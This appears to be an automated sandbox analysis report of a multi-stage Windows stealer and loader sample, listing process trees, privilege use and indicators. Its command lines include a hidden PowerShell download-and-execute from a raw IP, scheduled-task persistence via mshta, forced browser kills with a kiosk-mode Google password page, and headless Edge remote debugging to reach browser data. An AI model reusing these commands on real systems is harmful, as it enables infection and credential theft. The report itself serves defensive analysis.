description pid Process Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 4536 MSBuild.exe Token: SeIncreaseQuotaPrivilege 4536 MSBuild.exe Token: SeSecurityPrivilege 4536 MSBuild.exe Token: SeTakeOwnershipPrivilege 4536 MSBuild.exe Token: SeLoadDriverPrivilege 4536 MSBuild.exe Token: SeSystemProfilePrivilege 4536 MSBuild.exe Token: SeSystemtimePrivilege 4536 MSBuild.exe Token: SeProfSingleProcessPrivilege 4536 MSBuild.exe Token: SeIncBasePriorityPrivilege 4536 MSBuild.exe Token: SeCreatePagefilePrivilege 4536 MSBuild.exe Token: SeBackupPrivilege 4536 MSBuild.exe Token: SeRestorePrivilege 4536 MSBuild.exe Token: SeShutdownPrivilege 4536 MSBuild.exe Token: SeDebugPrivilege 4536 MSBuild.exe Token: SeSystemEnvironmentPrivilege 4536 MSBuild.exe Token: SeRemoteShutdownPrivilege 4536 MSBuild.exe Token: SeUndockPrivilege 4536 MSBuild.exe Token: SeManageVolumePrivilege 4536 MSBuild.exe Token: 33 4536 MSBuild.exe Token: 34 4536 MSBuild.exe Token: 35 4536 MSBuild.exe Token: 36 4536 MSBuild.exe Token: SeIncreaseQuotaPrivilege 4536 MSBuild.exe Token: SeSecurityPrivilege 4536 MSBuild.exe Token: SeTakeOwnershipPrivilege 4536 MSBuild.exe Token: SeLoadDriverPrivilege 4536 MSBuild.exe Token: SeSystemProfilePrivilege 4536 MSBuild.exe Token: SeSystemtimePrivilege 4536 MSBuild.exe Token: SeProfSingleProcessPrivilege 4536 MSBuild.exe Token: SeIncBasePriorityPrivilege 4536 MSBuild.exe Token: SeCreatePagefilePrivilege 4536 MSBuild.exe Token: SeBackupPrivilege 4536 MSBuild.exe Token: SeRestorePrivilege 4536 MSBuild.exe Token: SeShutdownPrivilege 4536 MSBuild.exe Token: SeDebugPrivilege 4536 MSBuild.exe Token: SeSystemEnvironmentPrivilege 4536 MSBuild.exe Token: SeRemoteShutdownPrivilege 4536 MSBuild.exe Token: SeUndockPrivilege 4536 MSBuild.exe Token: SeManageVolumePrivilege 4536 MSBuild.exe Token: 33 4536 MSBuild.exe Token: 34 4536 MSBuild.exe Token: 35 4536 MSBuild.exe Token: 36 4536 MSBuild.exe Token: SeDebugPrivilege 3916 taskkill.exe Token: SeDebugPrivilege 5964 taskkill.exe Token: SeDebugPrivilege 3368 taskkill.exe Token: SeDebugPrivilege 1496 taskkill.exe Token: SeDebugPrivilege 3964 taskkill.exe Token: SeShutdownPrivilege 3412 msiexec.exe Token: SeIncreaseQuotaPrivilege 3412 msiexec.exe Token: SeSecurityPrivilege 1372 msiexec.exe Token: SeCreateTokenPrivilege 3412 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3412 msiexec.exe Token: SeLockMemoryPrivilege 3412 msiexec.exe Token: SeIncreaseQuotaPrivilege 3412 msiexec.exe Token: SeMachineAccountPrivilege 3412 msiexec.exe Token: SeTcbPrivilege 3412 msiexec.exe Token: SeSecurityPrivilege 3412 msiexec.exe Token: SeTakeOwnershipPrivilege 3412 msiexec.exe Token: SeLoadDriverPrivilege 3412 msiexec.exe Token: SeSystemProfilePrivilege 3412 msiexec.exe Token: SeSystemtimePrivilege 3412 msiexec.exe Token: SeProfSingleProcessPrivilege 3412 msiexec.exe -
Suspicious use of FindShellTrayWindow 41 IoCs
pid Process 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 2384 firefox.exe 5528 efe6bfcae2.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 5528 efe6bfcae2.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 5528 efe6bfcae2.exe 2384 firefox.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 3756 rundll32.exe 3860 rundll32.exe 2804 rundll32.exe 4472 MSBuild.exe 4036 msedge.exe 6440 chrome.exe 6980 rundll32.exe 2168 rundll32.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 5528 efe6bfcae2.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 2384 firefox.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe 5528 efe6bfcae2.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2384 firefox.exe 4472 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2964 wrote to memory of 3632 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2964 wrote to memory of 3632 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2964 wrote to memory of 3632 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2964 wrote to memory of 5884 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2964 wrote to memory of 5884 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2964 wrote to memory of 5884 2964 2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3632 wrote to memory of 4928 3632 cmd.exe 89 PID 3632 wrote to memory of 4928 3632 cmd.exe 89 PID 3632 wrote to memory of 4928 3632 cmd.exe 89 PID 5884 wrote to memory of 2904 5884 mshta.exe 92 PID 5884 wrote to memory of 2904 5884 mshta.exe 92 PID 5884 wrote to memory of 2904 5884 mshta.exe 92 PID 2904 wrote to memory of 5476 2904 powershell.exe 99 PID 2904 wrote to memory of 5476 2904 powershell.exe 99 PID 2904 wrote to memory of 5476 2904 powershell.exe 99 PID 5476 wrote to memory of 5392 5476 Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE 101 PID 5476 wrote to memory of 5392 5476 Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE 101 PID 5476 wrote to memory of 5392 5476 Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE 101 PID 5392 wrote to memory of 3916 5392 rapes.exe 104 PID 5392 wrote to memory of 3916 5392 rapes.exe 104 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 3916 wrote to memory of 4536 3916 v1BRaoR.exe 105 PID 5392 wrote to memory of 3860 5392 rapes.exe 109 PID 5392 wrote to memory of 3860 5392 rapes.exe 109 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 3860 wrote to memory of 860 3860 Nehh6wZ.exe 110 PID 5392 wrote to memory of 3004 5392 rapes.exe 111 PID 5392 wrote to memory of 3004 5392 rapes.exe 111 PID 3004 wrote to memory of 1248 3004 31W3sid.exe 112 PID 3004 wrote to memory of 1248 3004 31W3sid.exe 112 PID 3004 wrote to memory of 1248 3004 31W3sid.exe 112 PID 3004 wrote to memory of 1248 3004 31W3sid.exe 112 PID 3004 wrote to memory of 1248 3004 31W3sid.exe 112 PID 3004 wrote to memory of 1248 3004 31W3sid.exe 112 PID 5392 wrote to memory of 816 5392 rapes.exe 113 PID 5392 wrote to memory of 816 5392 rapes.exe 113 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 816 wrote to memory of 1564 816 NlmvJyQ.exe 114 PID 5392 wrote to memory of 4460 5392 rapes.exe 116 PID 5392 wrote to memory of 4460 5392 rapes.exe 116 PID 4460 wrote to memory of 5500 4460 efd0386a9c.exe 117 PID 4460 wrote to memory of 5500 4460 efd0386a9c.exe 117 PID 4460 wrote to memory of 5500 4460 efd0386a9c.exe 117 PID 4460 wrote to memory of 5500 4460 efd0386a9c.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn GzgPtmadBI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn GzgPtmadBI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4928
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Users\Admin\AppData\Local\Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE"C:\Users\Admin\AppData\Local\Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5476 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5392 -
C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 13848⤵
- Program crash
PID:1984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:860
-
-
-
C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Checks SCSI registry key(s)
PID:1248
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494470101\efd0386a9c.exe"C:\Users\Admin\AppData\Local\Temp\10494470101\efd0386a9c.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5500 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 13288⤵
- Program crash
PID:1748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494480101\5c814807ae.exe"C:\Users\Admin\AppData\Local\Temp\10494480101\5c814807ae.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\10494490101\352038b977.exe"C:\Users\Admin\AppData\Local\Temp\10494490101\352038b977.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
PID:5656
-
-
C:\Users\Admin\AppData\Local\Temp\10494500101\efe6bfcae2.exe"C:\Users\Admin\AppData\Local\Temp\10494500101\efe6bfcae2.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5528 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2504
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2384 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2080 -initialChannelId {e180e26d-d945-4f8d-928c-60d98a3067d4} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:4476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {f1e29b3c-231c-4149-b88c-51c64f47aa84} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:5748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3888 -prefsLen 25164 -prefMapHandle 3892 -prefMapSize 270279 -jsInitHandle 3896 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3904 -initialChannelId {ddbefdf2-d68e-462c-a6a6-233f45aed643} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:5044
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4048 -prefsLen 27276 -prefMapHandle 4052 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {d407d8ce-9ca9-408f-b101-553da4b8041b} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:5588
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3128 -prefsLen 34775 -prefMapHandle 3920 -prefMapSize 270279 -jsInitHandle 2740 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4404 -initialChannelId {8eeeea2e-fde5-4898-a67c-adcb5eb7320c} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:2624
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5076 -prefsLen 35012 -prefMapHandle 5080 -prefMapSize 270279 -ipcHandle 5088 -initialChannelId {bcc20330-895b-44d9-9421-183aa661e926} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:4800
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5276 -prefsLen 32952 -prefMapHandle 5272 -prefMapSize 270279 -jsInitHandle 5268 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5368 -initialChannelId {c135734b-7074-4689-adfe-12e903c2f35a} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:3652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5540 -prefsLen 32952 -prefMapHandle 5544 -prefMapSize 270279 -jsInitHandle 5548 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5376 -initialChannelId {3c776e85-7713-4287-b9a8-07cdcc52e05c} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:4676
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5736 -prefsLen 32952 -prefMapHandle 5740 -prefMapSize 270279 -jsInitHandle 5744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {0125919d-f302-412e-ba94-1443c101c631} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:3004
-
-
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10494510271\33e3372c0a.msi" /quiet6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Users\Admin\AppData\Local\Temp\10494520101\367de4acd7.exe"C:\Users\Admin\AppData\Local\Temp\10494520101\367de4acd7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\10494530101\f078cfe6f7.exe"C:\Users\Admin\AppData\Local\Temp\10494530101\f078cfe6f7.exe"6⤵
- Executes dropped EXE
PID:632
-
-
C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:396 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Checks SCSI registry key(s)
PID:2096
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5776 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\girrhuqn\girrhuqn.cmdline"7⤵PID:5412
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB263.tmp" "c:\Users\Admin\AppData\Local\Temp\girrhuqn\CSCFD411049ADB451ABD77B5F2146D9A25.TMP"8⤵PID:4852
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Downloads MZ/PE file
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4472 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3756
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3860
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4036 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ffb818cf208,0x7ffb818cf214,0x7ffb818cf2209⤵PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2284,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:39⤵PID:4444
-
-
